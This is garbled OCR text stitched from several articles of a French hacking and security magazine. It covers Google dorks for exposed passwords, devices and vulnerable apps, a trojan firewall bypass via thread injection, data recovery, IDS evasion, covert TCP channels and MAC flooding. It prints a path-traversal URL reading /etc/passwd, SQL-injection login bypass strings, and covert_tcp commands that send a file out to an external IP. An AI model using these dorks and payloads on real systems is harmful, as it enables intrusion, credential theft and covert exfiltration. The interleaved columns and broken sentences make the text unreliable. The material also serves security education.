tion Services
"Oracle HTTP Server/* Server at" intitle:index.of n'importe quelle version de serveur Oracle
"IBM _ HTTP _ Server/* * Server at" intitle:index.of n'importe quelle version de serveur IBM
"Netscape/* Server at" intitle:index.of n'importe quelle version de serveur Netscape
"Red Hat Secure/*" intitle:index.of n'importe quelle version de serveur Red Hat Secure
"HP Apache-based Web Server/*" intitle:index.of n'importe quelle version de serveur HP
Tableau 3. Questions sur les pages standard après l'installation des serveurs Web
Question Serveur
intitle:"Test Page for Apache Installation" "You are Apache 1.2.6
free"
de consulter, de supprimer et /etc/passwd (voir la Figure 3). Bien à la possibilité d'insérer le code SQL
même de modifier tous fichiers sûr, pour trouver les serveurs vulné- – voir l'article Attaques par injection
présents sur le serveur concerné. rables, l'agresseur utilisera Google SQL avec PHP et MySQL dans ha-
Malheureusement, WebJeff Filema- en posant la question : "WebJeff-Fi- kin9 n° 3/2005) d'obtenir l'accès au
nager en version 1.6 a une erreur lemanager 1.6" Login. panneau de configuration. Il suffit
permettant de lire le contenu de La deuxième application – Ad- de trouver la page d'ouverture de
n'importe quel fichier se trouvant vanced Guestbook – est un logiciel session au panneau (voir la Figure 4)
sur le serveur auquel peut accéder écrit en PHP utilisant la base de et d'ouvrir la session en laissant le
l'utilisateur démarrant un naviga- données SQL permettant d'ajouter champ username vide et de taper
teur Web. Il suffit donc que l'intrus des messages laissés par les visi- dans le champ password ') OR ('a'
tape dans le système vulnérable teurs au livre d'or du site visité. En = 'a ou à l'inverse – laisser le champ
l'adresse /index.php3?action=tele- avril 2004, l'information concernant password vide et taper ? or 1=1
charger&fichier=/etc/passwd pour un trou de sécurité dans la version – dans le champ username. Pour
qu'il obtienne le contenu du fichier 2.2 de ce logiciel permettant (grâce trouver sur le réseau les sites vulné-
Informations sur
les réseaux et les
systèmes
Presque chaque attaque contre un
système informatique est précédée
de son étude. En règle générale,
cela consiste à scanner les ordina-
teurs – c'est un essai ayant pour but
de définir les services en marche, un
type de système d'exploitation uti-
lisé et la version du logiciel utilitaire.
Figure 4. Advanced Guestbook – page d'ouverture de session
Pour cela, on utilise le plus souvent
les scanners de type Nmap ou amap
mais il existe encore une option
à choisir. Plusieurs administrateurs
installent des applications Web
générant sans arrêt les statistiques
de travail du système, informant sur
l'encombrement des disques durs et
contenant les listes des processus
démarrés et même les journaux
système.
Pour un intrus, ce sont des in-
formations très précieuses. Il suffit
qu'il demande à Google de trouver
les statistiques du logiciel phpSys-
tem : "Generated by phpSystem"
et il obtiendra des pages similaires
Focus
Question Résultat
"A syntax error has occur- les messages d'erreur de la base Informix – ils peuvent contenir les noms des
red" filetype:ihtml fonctions ou de fichiers, des informations sur la répartition des fichiers, des frag-
ments du code SQL et des mots de passe
"Access denied for user" les erreurs d'authentification – ils peuvent contenir des noms d'utilisateur, des
"Using password" noms des fonctions, des informations sur la répartition de fichiers et de fragments
de code SQL
"The script whose uid is " les messages d'erreur PHP liés au contrôle d'accès – ils peuvent contenir des noms
"is not allowed to access" de fichiers ou de fonctions et des informations sur la répartition des fichiers
"ORA-00921: unexpected end of les messages d'erreur de la base Oracle – ils peuvent contenir des noms de
SQL command" fichiers ou de fonctions et des informations sur la répartition des fichiers
"error found handling the les messages d'erreur du logiciel Cocoon – ils peuvent contenir le numéro de la
request" cocoon filetype:xml version Cocoon, des noms de fichiers ou de fonctions et des informations sur la
répartition des fichiers
"Invision Power Board Data- les messages d'erreur du forum de discussion Invision Power Board – ils peuvent
base Error" contenir des noms de fonctions et de fichiers, des informations sur la répartition
de fichiers dans le système et des fragments du code SQL
"Warning: mysql _ query()" les messages d'erreur de la base MySQL – ils peuvent contenir des noms d'uti-
"invalid query" lisateur, des noms de fonctions des fichiers et des informations sur la répartition
des fichiers
"Error Message : Error loa- les messages d'erreur des scripts CGI – ils peuvent contenir des informations sur le
ding required libraries." type du système d'exploitation et la version du logiciel, des noms d'utilisateur, des
noms de fichiers et des informations sur la répartition de fichiers dans le système
"#mysql dump" filetype:sql les messages d'erreur de la base MySQL – ils peuvent contenir des informations
sur la structure et le contenu de la base de données
Question Résultat
"http://*:*@www" site les mots de passe pour la page « site » enregistrés comme
« http://username:password@www... »
filetype:bak inurl:"htaccess|passwd|shadow| les copies de sauvegarde de fichiers pouvant contenir des informa-
htusers" tions sur des noms d'utilisateurs et des mots de passe
filetype:mdb inurl:"account|users|admin|admi les fichiers de type mdb qui peuvent contenir des informations sur
nistrators|passwd|password" les mots de passe
intitle:"Index of" pwd.db les fichiers pwd.db peuvent contenir des noms d'utilisateurs et des
mots de passe cryptés
inurl:admin inurl:backup intitle:index.of les répertoires nommés admin et backup
"Index of/" "Parent Directory" "WS _ les fichiers de configuration du logiciel WS_FTP pouvant contenir
FTP.ini" filetype:ini WS _ FTP PWD des mots de passe pour des serveurs FTP
ext:pwd inurl:(service|authors|administrato des fichiers contenant des mots de passe du logiciel Microsoft
rs|users) "# -FrontPage-" FrontPage
filetype:sql ("passwd values ****" | "pas- des fichiers contenant des codes SQL et des mots de passe ajou-
sword values ****" | "pass values ****" ) tés à la base de données
intitle:index.of trillian.ini des fichiers de configuration du logiciel de messagerie instantanée
Trillian
eggdrop filetype:user user des fichiers de configuration de l’ircbot Eggdrop
filetype:conf slapd.conf des fichiers de configuration de l'application OpenLDAP
inurl:"wvdial.conf" intext:"password" des fichiers de configuration du logiciel WV Dial
ext:ini eudora.ini des fichiers de configuration du logiciel de messagerie électronique
Eudora
filetype:mdb inurl:users.mdb des fichiers Microsoft Access pouvant contenir des informations sur
des comptes
intext:"powered by Web Wiz Journal" des services Web utilisant l'application Web Wiz Journal permettant
dans la configuration standard de télécharger un fichier contenant
les mots de passe ; au lieu de l'adresse par défaut http://<host>/
journal/, il faut taper http://<host>/journal/journal.mdb
"Powered by DUclassified" -site:duware.com des services Web utilisant les applications DUclassified, DUcalen-
"Powered by DUcalendar" -site:duware.com dar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum
"Powered by DUdirectory" -site:duware.com ou DUpics qui, dans la configuration standard, permettent de télé-
"Powered by DUclassmate" -site:duware.com charger un fichier contenant les mots de passe ; au lieu de l'adres-
"Powered by DUdownload" -site:duware.com se par défaut (pour DUclassified) http://<host>/duClassified/, il faut
"Powered by DUpaypal" -site:duware.com taper http://<host>/duClassified/_private/duclassified.mdb
Focus
Question Résultat
filetype:xls inurl:"email.xls" des fichiers email.xls pouvant contenir des adresses
Question Périphérique
"Copyright (c) Tektronix, Inc." "printer status" les imprimantes PhaserLink
inurl:"printer/main.html" intext:"settings" les imprimantes Brother HL
intitle:"Dell Laser Printer" ews les imprimantes Della basées sur la technologie EWS
intext:centreware inurl:status les imprimantes Xerox Phaser 4500/6250/8200/8400
inurl:hp/device/this.LCDispatcher les imprimantes HP
intitle:liveapplet inurl:LvAppl les caméras Canon Webview
intitle:"EvoCam" inurl:"webcam.html" les caméras Evocam
inurl:"ViewerFrame?Mode=" les caméras Panasonic Network Camera
(intext:"MOBOTIX M1" | intext:"MOBOTIX M10") intext: les caméras Mobotix
"Open Menu" Shift-Reload
Données personnelles des utilisateurs. Malheureusement, votre Curriculum Vitae envoyé pour
Focus
et documents il arrive que les différents docu- la recherche d'un emploi pour qu'il
ments confidentiels contenant connaisse votre adresse, votre nu-
confidentiels vos données soient mis dans des méro de téléphone, votre date de
Aussi bien que dans les pays fai- endroits accessibles au grand pu- naissance, votre niveau d'étude,
sant parti de l'Union Européenne blic ou envoyés via le réseau sans vos centres d'intérêts et votre expé-
qu'aux États-Unis, il existe des être pour autant sécurisés. Il suffit rience professionnelle.
régulations juridiques ayant pour donc que l'intrus obtienne l'accès Sur le réseau, il y a plein de
but de protéger la confidentialité au courrier électronique contenant documents de ce type. Pour les
Périphériques réseaux
Plusieurs administrateurs ne pren-
nent pas au sérieux la sécurité
des périphériques tels que les im-
primantes réseaux ou les caméras
Web. Pourtant, une imprimante mal
sécurisée peut devenir la première
cible à attaquer par l'intrus qu'il
Figure 13. Page de configuration de l'imprimante HP trouvée par Google utilisera ensuite pour réaliser des
attaques contre d'autres systèmes
trouver, il faut poser la question sui- notamment si celles-ci concernent sur le réseau. Les caméras Inter-
vante : intitle:"curriculum vitae" les contacts dans le cadre d'une so- net ne sont pas très dangereuses
"phone * * *" "address *" "e-mail". ciété. Dans ce cas, il est conseillé et peuvent être considérées comme
Il est également facile de trouver de taper la question : filetype:xls un divertissement mais il n'est pas
des adresses sous forme de listes inurl:"email.xls" permettant de difficile d'imaginer la situation où
de noms, de numéros de téléphones trouver des feuilles de calcul nom- les données de ce type auraient
et d'adresses e-mail (Figure 11). mées email.xls. de l'importance (une espièglerie
Cela résulte du fait que presque La même situation concerne les industrielle, un vol à main armée).
tous les utilisateurs d'Internet logiciels de messagerie instantanée Les questions sur les imprimantes
créent différents types de carnets et les listes de contacts enregistrées. et les caméras se trouvent dans le
d'adresses électroniques – ceux-ci Quand une liste de ce type tombe Tableau 8 et la Figure 13 représente
sont peu importants pour un intrus entre les mains d'un intrus, celui-ci la page de configuration de l'impri-
moyen mais un manipulateur habile pourra essayer de se faire passer mante trouvée sur le réseau. n
(social engineering) sera capable pour vos amis. Ce qui est intéres-
d'utiliser au mieux ces données, sant, c'est qu'un grand nombre de
S
upposons que vous ayez développé tant puisse faire la différence entre ce que
un cheval de Troie ou un logiciel de notre programme et le programme autorisé
ce genre. Malheureusement, vos vic- font (le tout en notre faveur). Bien qu'à priori
times utilisent un pare-feu censé bloquer les difficile, ce procédé est relativement aisé.
tentatives de connexion et même découvrir Tout ce dont nous avons besoin est fourni par
l'existence de cet outil (voir la Figure 1). Il vous l'API de Windows.
faut, d'une manière ou d'une autre, percer ce
système de sécurité. Programmation d'un
Un pare-feu performant possède en gé- contournement
néral une fonction chargée de sauvegarder Afin de contourner discrètement un pare-feu,
les règles de sécurité de sorte que l'utilisateur il vous suffit de regrouper les fonctions de votre
n'ait pas à être informé à chaque tentative de
connexion des outils obligés d'établir des con-
nexions très souvent – comme les navigateurs, Cet article explique...
les clients email, les filtres antispam, les mes-
• comment contourner les pare-feux personnels
sageries instantanées, etc. L'utilisateur accorde
sous Windows,
ces permissions lorsqu'il pense que ce logiciel • comment joindre des fils d'exécution externes
est confidentiel et lorsqu'il sait qu'il va l'utiliser aux processus.
très souvent.
Pratique
À propos de l'auteur
Diplômé d'informatique, Mark Hamil-
ton travaille comme consultant indé-
pendant en sécurité pour le compte
de PME ainsi que de particuliers.
En plus de la neuroinformatique
et du grid computing, la sécurité des
applications Web et des réseaux re-
présentent les principaux domaines
de son activité. Le présent article est
sa première publication.
LPVOID RemoteFileName;
TCHAR ModuleFileName[MAX_PATH];
• LPVOID RemoteFileName,
LPTSTR FileName; • TCHAR ModuleFileName[MAX _ PATH],
HANDLE hRemoteThread; • LPTSTR FileName,
HINSTANCE RemoteModule; • HANDLE hRemoteThread,
hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
• HINSTANCE RemoteModule.
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
Suite sur la page suivante
La variable intitulée RemoteFileName
est nécessaire pour attribuer de
la mémoire RAM, et les variables
Sur Internet
• http://www.msdn.microsoft.com – The Microsoft Developer Network,
• http://www.winapi.org – le site consacré à la programmation sous Windows.
V
otre serveur a été victime d'un pira- les données à partir de différents types de sys-
tage. L'intrus était si malicieux qu'il a tèmes de fichiers.
supprimé plusieurs fichiers importants
sur votre disque dur, y compris le programme Préparation de la partition
que vous élaboré depuis plusieurs mois. Avant à la récupération des données
de réinstaller le système (afin d'éliminer du Indépendamment du système de fichiers à par-
code malin laissé par l'intrus), il serait bien de tir duquel vous voulez récupérer vos données,
récupérer les données. Pour cela, vous pourrez il faut démonter la partition sur laquelle vous
utiliser les outils disponibles dans chaque dis- travaillerez. Pour être au moins un petit peu sûr
tribution Linux. que les données n'ont pas été endommagées,
il faut exécuter cette étape juste après la sup-
Outils nécessaires pression des fichiers.
Le premier élément indispensable est un jeu
d'outils permettant de travailler sur les systè-
mes de fichiers ext2 et ext3 – il s'agit ici du pa- Cet article explique...
quet e2fsprogs. Pour vous, le plus important est
• comment récupérer les données à partir des
debugfs, qui – comme son nom l'indique – sert
systèmes de fichiers de type ext2 et ext3,
à déboguer le système de fichiers. Par défaut
Pratique
• du type de fichier – un fichier ordiniare, un répertoire ou un fichier de périphéri- La seconde méthode de démontage
que, d'un système système de fichiers
• de l'identifiant UID du propriétaire, consiste à le mettre en mode RO
• de la liste de blocs disque et de leurs fragments constituant le fichier. (read only). Ainsi, vos fichiers ne
pourront pas être remplacés. Pour
L'inode peut être traité comme un identifiant du fichier sur le disque dur, utilisé par le
ce faire, tapez la commande sui-
système pour retrouver le fichier souhaité. À chaque fichier sur la partition donnée,
vante :
un seul inode est affecté.
$ dd if=/dev/hda10 \
Figure 2. La structure des blocs dans le système de fichiers ext2 >~/hda10.backup.img
Consultons le Listing 5. Nos ino- Démontons donc la partition :
des ont été supprimés d'un système Pour nous faciliter un peu la tâche,
de fichiers. La démarche que nous # umount /dev/hda10 nous pouvons diviser notre partition
avons choisie ne mène nulle part. en parties plus petites. Si la partition
Pourtant, nous pouvons essayer Ensuite, nous devons la monter de a la taille de 1 Go, il est juste de la
Pratique
une certaine astuce – vérifier si le nouveau en tant qu'ext2, et cela en partitionner en 10 parties de 100 Mo
système d'exploitation considérait le mode read only pour les raisons de chacune. Un simple script spéciale-
système de fichier comme ext2. La sécurité : ment conçu à cet effet est présenté
solution est divisée en trois étapes : dans le Listing 7 – le disque dur peut
# mount -o ro -t ext2 \ être partitionné à l'aide de la com-
• démonter le système de fichiers, /dev/hda10 /tmp mande suivante :
• le monter de nouveau, mais cette
fois-ci en tant qu'ext2, Maintenant, essayons de travailler $ dsksplitter.pl 10 1000000 \
• récupérer les fichiers. avec debugfs de la façon présentée /dev/hda10 ~/dsk.split
$ grep -n -a -1 \
"int main" ~/dsk.split/*
Listing 6. La récupération des données de la partition ext3 montée en
L'option -n affichera le numéro de la tant qu'ext2
ligne du fichier dans lequel se trouve debugfs: lsdel
la chaîne de caractères souhaitée. Inode Owner Mode Size Blocks Time deleted
Grâce à l'option -a, les fichiers binai- (...)
res sont traités comme fichiers texte, 20 0 100644 41370 14/14 Tue Feb 14 19:20:25 2005
(...)
par contre -1 affichera une ligne
24 0 100644 17104 5/5 Tue Feb 15 19:13:26 2005
avant et une ligne après la chaîne 352 deleted inodes found.
retrouvée. Bien sûr, il est possible de debugfs:
changer la chaîne int main par une
chaîne de caractères quelconque.
Nous avons obtenu les résultats : Listing 7. dsksplitter.pl – un script simple servant à partitionner les
disques durs
~/dsk.split/dsk.1:40210:§
#include <sys/socket.h> #!/usr/bin/perl
if ($ARGV[3] eq "") {
~/dsk.split/dsk.1:40211:§
print "Usage:\ndsksplitter.pl <dsk_parts> <part_size in Kb>
int main (int argc, char *argv[])
<partition_to_split> <target_dir>";
~/dsk.split/dsk.1:40212:§ }
{ (...) else
{
$parts = $ARGV[0];
L'Ext3 enregistre de nouveaux fi-
$size = $ARGV[1];
chiers au début du disque dur, nous $partition = $ARGV[2];
pouvons donc supposer que la ligne $tardir = $ARGV[3];
trouvée est justement celle que nous for ($i = 1; $i <= $parts; $i++) {
cherchons. Essayons donc encore system "dd bs=1k if=$partition of=$tardir/dks.$i
count=$size skip=$ix$size";
une fois de partitionner le disque dur
}
et y rechercher les données :
$ mkdir ~/dsk1.split
$ dsksplitter.pl 10 10000 \ Le résultat obtenu : Maintenant, nous avons le fichier
~/dsk.split/dsk.1 ~/dsk1.split contenant le programme supprimé
~/dsk1.split/dsk.3:143:§ par un intrus. Bien que le fichier
Exécutons maintenant la commande #include <sys/socket.h> dans lequel celui-ci se trouve a 10
grep sur le fichier dsk.1 partitionné : ~/dsk1.split/dsk.3:144:§ Mo, c'est mieux que d'effectuer la
int main (int argc, char *argv[]) recherche sur 1 Go de données.
$ grep -n -a -1 \ ~/dsk1.split/dsk.3:145:§ Pourtant, si cette précision ne nous
"int main" ~/dsk1.split/* { (...) suffit pas, nous pouvons tenter de
diviser le fragment intéressant du
disque dur en parties encore plus
Sur Internet petites. Si ce fichier sera réduit
à une taille qui nous convient,
• http://e2fsprogs.sourceforge.net – le site du paquet e2fsprogs,
• http://web.mit.edu/tytso/www/linux/ext2fs.html – le site de l'ext2fs,
il nous reste de lancer un éditeur de
• http://www.namesys.com – le site des auteurs du ReiserFS, texte quelconque et de supprimer
• http://oss.software.ibm.com/developerworks/opensource/jfs – le site du système les lignes superflues.
de fichiers jfs, Cette technique prend beau-
• http://oss.sgi.com/projects/xfs – le site du projet xfs, coup de temps, mais elle est très
• http://www.securiteam.com/tools/6R00T0K06S.html – le paquet unrm. efficace. Elle était testée sur plu-
sieurs distributions de Linux, mais
et les traces des inodes seront corri- heureux hasard. et la bibliothèque e2undel écrite
gées et restaurées. Pour cela, nous Comme cela est présenté sur par Olivier Diedrich fonctionnant
disposons de la commande : la Figure 1, dans les systèmes de avec le paquet e2fsprogs. Bien sûr,
fichiers avec journalisation, de nou- vous ne devez pas vous attendre
# reiserfsck –rebuild-tree -S \ veaux fichiers sont enregistrés au à récupérer 100% de fichiers sup-
-l /home/aqu3l/recovery/log /dev/loop0 début du disque dur. Théoriquement, primés (bien que parfois cela soit
notre fichier se trouve juste après possible) – si vous réussissez
Grâce à l'option -S, il sera possible ce qu'on appelle bloc principal (en à sauver environ 80%, on pourra
de vérifier le disque dur entier, et pas anglais root block), c'est-à-dire, le parler d'un grand succès. n
U
n système de détection d'intrusion peut C'est dans le domaine de l'audit que remonte
être comparé à une alarme domesti- l'origine des systèmes de détection d'intrusion,
que contre les cambrioleurs – si une comme le relate l'ouvrage parfaitement docu-
tentative d'intrusion malveillante est décou- menté intitulé A Guide to Understanding Audit
verte, une réponse de quelque nature qu'elle in Trusted Systems (publié sous la collection
soit sera alors déclenchée. Plus de capteurs Rainbow Series du ministère de la Défense
sont paramétrés, meilleur est le système, puis- des États-Unis), et également connu sous
que chaque capteur est chargé de détecter un le titre de The Tan Book. Les auteurs de cet
type particulier d'activité (telle que l'ouverture ouvrage définissent l'audit comme un contrôle
des portes ou des fenêtres, une détection vo- et une révision indépendants des activités et des
lumétrique etc.). Toutefois, à l'instar de tous les
autres systèmes automatiques, un système de
Cet article explique...
détection d'intrusion peut présenter des failles,
émettre de fausses alertes ou être contourné • la nature des systèmes de détection d'intrusion,
par des techniciens hautement qualifiés sur ce • la façon de contourner les solutions proposées
genre de matériel. par les systèmes de détection d'intrusion,
Le premier système de détection d'intrusion • la façon de se protéger contre les fuites de tels
a vu le jour au début des années 80 ; il s'agissait systèmes.
Science
Les solutions de
détection d'intrusion
Il existe trois approches différentes
en matière de détection d'intrusion.
La première est le système de détec-
tion d'intrusion au niveau du réseau
ou Network Intrusion Detection Sys-
tem (NIDS), largement utilisé, chargé
d'analyser de manière passive le trafic
réseau, et de chercher les activités
malveillantes. La deuxième approche
est le système de détection d'intru-
sion au niveau des hôtes ou Host
Figure 1. Modèle CIDF (Common Intrusion Detection Framework) d'un
Intrusion Detection System (HIDS),
système de détection d'intrusion au niveau du réseau
fonctionnant sur un hôte surveillé pour
enregistrements d'un système. En rè- caine. Dans sa publication scientifi- y détecter des intrusions. Enfin, la troi-
gle générale, l'audit permet de remon- que, il a décrit comment restreindre sième approche, et la moins utilisée,
ter à la source des événements et de le champ des audits uniquement aux est le système de détection d'intrusion
découvrir des activités illégales. conditions de sécurité pertinentes au niveau des nœuds du réseau ou
James Anderson fut le premier et comment discerner les activités Network Node Intrusion Detection
à développer ces systèmes de dé- normales des illégales. Plus tard eut System (NNIDS) – solution hybride
tection d'intrusion naissants pour lieu la démonstration publique du regroupant les caractéristiques des
le compte de l'armée de l'air améri- Network System Monitor, système NIDS mentionnés plus haut, tout en
n'analysant qu'une partie (ou nœud)
du trafic réseau. Les approches de
Snort, fer de lance de la détection d'intrusion détection comprennent les tâches
Snort est un outil libre développé en 1998 par Martin Roesch de l'équipe Sourcefire. de contrôle de l'activité du réseau en
Aujourd'hui, des entreprises, des universités, des agences gouvernementales etc. du
cherchant des modèles particuliers
monde entier ont recours à cet outil – la documentation de Snort est disponible en plus
(ou signatures) afin de réaliser une
de 10 langues. La version la plus récente, sortie en mai 2005 est Snort 2.3.3, téléchar-
analyse statistique sur cette activité
geable à partir du site http://www.snort.org.
Snort peut être configuré afin de fonctionner selon trois modes principaux : pour déterminer si les données ont
été modifiées ou non. La Figure 1
• mode sniffeur, permet de mieux comprendre le type
• mode enregistreur de paquets de données, d'analyse réalisée.
• mode système de détection d'intrusion réseau. Par Common Intrusion Detec-
tion Framework (CIDF), on désigne
Le dernier mode est de loin le plus complexe et le plus difficile à configurer. Ce logiciel
l'ensemble des composants qui
est chargé d'analyser le trafic réseau selon des règles définies et de réaliser certaines
actions (comme par exemple déclencher une alerte). La page consacrée au manuel définissent un système de détec-
d'utilisation de Snort ainsi que les données de sortie de la commande snort -? contien- tion d'intrusion (l'objectif consiste à
nent les informations nécessaires pour lancer l'outil en différents modes. Par exemple, créer un modèle de conception pour
activer le mode système de détection d'intrusion réseau revient à taper les éléments ces systèmes). Ces composants
suivants : comprennent la génération d'événe-
ments, les modules d'analyse, les
# snort –dev –l ./log \
mécanismes de stockage et même
–h 10.10.10.0/24 –c snort.conf
les contre-mesures. La plupart des
où le dernier fichier indiqué représente le nom de notre fichier de règles. Chaque paquet systèmes de détection d'intrusion
de données sera ainsi contrôlé afin d'y trouver une règle correspondante ; si tel est le se contentent de chercher des si-
cas, une action est alors déclenchée. gnes d'attaques connues, appelés
Quelques exemples de signatures sont exposés dans le Tableau 1. signatures, comme par exemple les
définitions antivirus. La principale
À propos de l'auteur
Antonio Merola travaille en tant qu'ex-
pert confirmé de la sécurité chez
Telecom Italia. Au cours de sa car-
rière professionnelle, il a été confronté
à de nombreux aspects de la sécurité.
Son statut d'indépendant lui permet
de prodiguer ses services à plusieurs
sociétés en tant que consultant et ins-
Science
S
téganographie : (en grec steganos de
Stégo, Stégein – couvert, serré, dissi- Cet article explique...
mulé ; en français graphie, suffixe tiré
du grec : Graphé – écriture, exprimant l'idée de • comment dissimuler des données dans les en-
têtes TCP et IGMP,
dessin, signes : org. grec Graphein – graver,
• comment utiliser l'application covert_tcp dans
écrire, dessiner). Traduit du grec, ce terme
le domaine de la communication en réseau.
signifie une écriture dissimulée/cachée, avec
la notion de sous couvert de, en étant compris
à l'intérieur de. Les débuts de la stéganographie
Ce qu'il faut savoir...
remontent en fait à l'Antiquité où déja les Anciens • connaître le modèle ISO/OSI qui relève de l'Ar-
tentaient de mettre des informations à l'abri du chitecture des Réseaux,
regard des autres. On écrivait, par exemple, les • avoir au moins une connaissance de base de la
messages sur du bois qui était ensuite recouvert famille de protocoles TCP/IP.
de cire sombre empêchant ainsi la lecture par
opacité. En stéganographie, on tente en plus,
de masquer la volonté même, de communiquer ;
ce qui la distingue de la cryptographie classique, À propos de l'auteur
Łukasz Wójcicki poursuit ses études doctorales
où l'on encrypte l'information de tel sorte, qu'elle
Science
TCP
Drapeaux des paquets TCP
Le protocole couche de transport • URG (urgent) – indicateur du mode urgent. Il informe si l'expéditeur a passé en
TCP (voir l’Encadré Couches du mode urgent du protocole TCP. Cela a lieu lorsque quelque chose d'important se
protocole TCP/IP) a été conçu pour produit à un bout de la connexion et lorsqu'il faut en informer le plus vite possible
créer des connexions infaillibles en- l'autre partie.
tre les périphériques réseau dans • ACK (acknowledgement) – signifie qu'un participant de la connexion envoie un
un environnement réseau composé. accusé de réception (en anglais acknowledgment) pour confirmer la réception d'un
Pour voir l'en-tête du protocole TCP, paquet de données.
• PSH (push) – si ce drapeau est défini, le module de réception TCP doit transmettre
reportez-vous à la Figure 3.
les données à l'application le plus vite possible (méthode push).
L'en-tête du paquet TCP comprend
• RST (reset) – signifie la mise à zéro de la connexion.
un champ Drapeaux de 6 bits. Les bits • SYN (sync) – signifie un segment de données comprenant un numéro de séquen-
en question (voir l'Encadré Drapeaux ce initial qu'un participant va envoyer via cette connexion.
des paquets TCP) définissent la • FIN (finish) – signifie qu'un segment donné finit l'envoi des données.
destination et le contenu du segment
TCP. À la base de leur contenu, un
nœud réseau sait comment interpré-
ter les autres champs dans l'en-tête. Couches du protocole TCP/IP
Il existe 64 différentes combinaisons • Couche d'interface réseau – reçoit les datagrammes IP et les envoie via un réseau
des paramètres pour les bits donnés donné.
– certaines sont redondantes, ce qui • Couche d'inter réseau – elle est responsable de la communication entre les machi-
permet de créer les canaux cachés. nes. Elle reçoit les paquets de la couche de transport avec les informations ayant
La plupart des segments TCP pour but d'identifier le destinataire, elle encapsule le paquet dans le datagramme IP,
possèdent le bit ACK positionné elle remplit son en-tête, elle vérifie si le datagramme doit être envoyé directement
(la valeur du bit ACK est égale au destinataire ou au routeur et elle transmet le datagramme à une interface ré-
à 1) – cela résulte du fait que la seau.
• Couche de transport – sa tâche principale est d'assurer la communication entre
connexion TCP est réalisée dans les
Science
les logiciels d'utilisateur. Cette couche peut régler le transfert des informations.
deux sens ; c'est-à-dire en mode de
Elle peut également assurer son infaillibilité. Pour cela, elle organise l'envoi d'un
fonctionnement bidirectionnel simul-
accusé de réception par le destinataire et le nouvel envoi des paquets perdus par
tané (en anglais full duplex). l'expéditeur.
La combinaison redondante • Couche de logiciels utilitaires – à un niveau supérieur, les utilisateurs appellent
des bits témoins peut se présenter les logiciels utilitaires ayant l'accès aux services TCP/IP. Les logiciels utilitaires
comme celle sur la Figure 4. Son in- coopèrent avec l'un des protocoles de communication au niveau de la couche de
terprétation est la suivante : un parti- transport et ils envoient ou reçoivent les données sous la forme des messages ou
cipant de la connexion envisage de du flux d'octets.
mettre fin à l'échange des données
IGMP
La diffusion multiple (en anglais
multicasting) consiste à envoyer les
données seulement à un groupe
donné des périphériques réseau.
Les routeurs et les hôtes supportant
Figure 5. Structure du datagramme IP la diffusion multiple doivent utiliser le
protocole IGMP pour échanger les
informations au sujet de l'apparte-
nance des hôtes donnés à un groupe
spécifié de ce type de diffusion.
Dans le protocole IGMP, il existe
deux types de messages :
• le rapport d'appartenance à un
groupe donné (en anglais host
membership report) et le mes-
sage informant sur la sortie du
groupe (en anglais leave group
message) ; les messages sont
Science
il est possible de distinguer les types Une méthode de ce type est utilisée cachés (les champs redondants sont
de datagrammes IP suivants : par l'application covert_tcp créée par souvent filtrés par les périphériques
Craig H. Rowland. Après avoir mo- réseau adéquats).
• de l'hôte au routeur avec la frag- difié le code, l'application peut servir L'application en question uti-
mentation autorisée, également à cacher les informations lise les champs obligatoires suivants
• de l'hôte au routeur – la fragmen- dans les champs redondants présents dans l'en-tête du protocole TCP/IP :
tation est interdite, dans les en-têtes des protocoles. co-
• du routeur à l'hôte avec la frag- vert_tcp n'utilise pas la dernière possi- • le champ Identification dans
mentation autorisée, bilité étant donné qu'il est facile de se le datagramme IP – c'est un
• du routeur à l'hôte – la fragmenta- protéger contre ce type de messages champ unique utilisé dans le
tion est interdite.
Manipuler le champ
Identification dans le
datagramme IP
Cette méthode consiste à remplacer
la valeur originale par la valeur ASCII
d'un caractère donné. Si l'une des
parties veut faire passer un message
donné – via le port 80, par exemple
– elle doit démarrer le logiciel en ta-
pant la commande suivante :
$ covert_tcp \
-source <IP de l'expéditeur> \
-server \
-file <fichier avec les données §
à enregistrer>
port 80 ouvert (le résultat du scanner • le client doit confirmer la récep- valeur ASCII d'un caractère qui
Nmap affichant les ports ouverts est tion du segment SYN en prove- vous intéresse. Si l'une des parties
présenté sur la Figure 11). nance du serveur. veut faire passer un certain mes-
Il peut alors taper (Figure 12) la sage – du port source 20 au port
commande suivante sur un ordina- Dans ce cas, il est également pos- destination 20, par exemple – elle
teur de société : sible de remplacer la valeur origi- doit démarrer l'application via la
nale du numéro des données par la commande suivante :
$ covert_tcp \
-dest 194.29.169.135 \
-dest_port 80 \
-seq -file code.c
$ covert_tcp \
-source_port 80 \
-server -seq \
-file resultat.txt
C
ontrairement au concentrateur (hub), – nous allons commencer par un exemple plus
le commutateur (switch) transfère simple, c'est-à-dire MAC-flooding.
les trames seulement entre les ports
appropriés – ceux auxquels sont connectés Attention – inondation !
respectivement l'expéditeur et le destinataire MAC-Flooding consiste à inonder le réseau
du message. Les décisions concernant l'envoi par des trames avec des fausses adresses. En
du message arrivant vers les ports appropriés général, ces trames sont envoyées par l'intrus
sont prises à partir de la table d'adresses à une adresse de diffusion ou à une adresse qui
matérielles stockée dans la mémoire du com- n'existe pas dans le réseau. Ces trames par-
mutateur liées aux numéros de ses ports. viendront à notre carte dans les deux cas – que
Le commutateur pendant son fonctionnement l'attaque soit réussie ou non (si l'assaillant les
apprend (à partir de l'adresse de l'expéditeur adresse à notre voisin, elles ne parviendront
se trouvant dans les trames qui y parviennent) à notre machine qu'au cas où l'attaque sur le
les adresses matérielles des périphériques commutateur a réussi). Alors, si les trames
Fiche technique
Figure 2. Le résultat de l'analyse du programme AntyMACflooding notre réseau, mais nous n'avons pas
de temps pour vérifier si l'une d'elles
sur la Figure 2) – environ la moitié et envoient des trames inconnues n'a pas changé (le programme sous
des trames interceptées ont été en- ne pouvant pas être identifiées par Linux arpwatch ou un système de
voyées à partir d'adresses physiques notre programme. Mais c'est un outil détection des intrus approprié peu-
MAC inconnues. pour les administrateurs qui, quand vent le faire pour nous). L'unique
Bien sûr, il peut arriver que
pendant l'écoute, de nouveaux or-
dinateurs se sont joints au réseau, Sur Internet
ou bien il existe des machines uti-
lisant une autre pile de protocoles • http://www.kis.p.lodz.pl/~mszmit/zasoby.html – le paquet d'outils pour le sniffing,
• http://winpcap.polito.it/install/default.htm – la bibliothèque WinPcap.
– par exemple IPX/SPX, qui n'ont
pas répondu aux requêtes ARP
hw_address
Vous pouvez en quelques minutes et en toute sécurité vous abonner à votre magazine préféré.
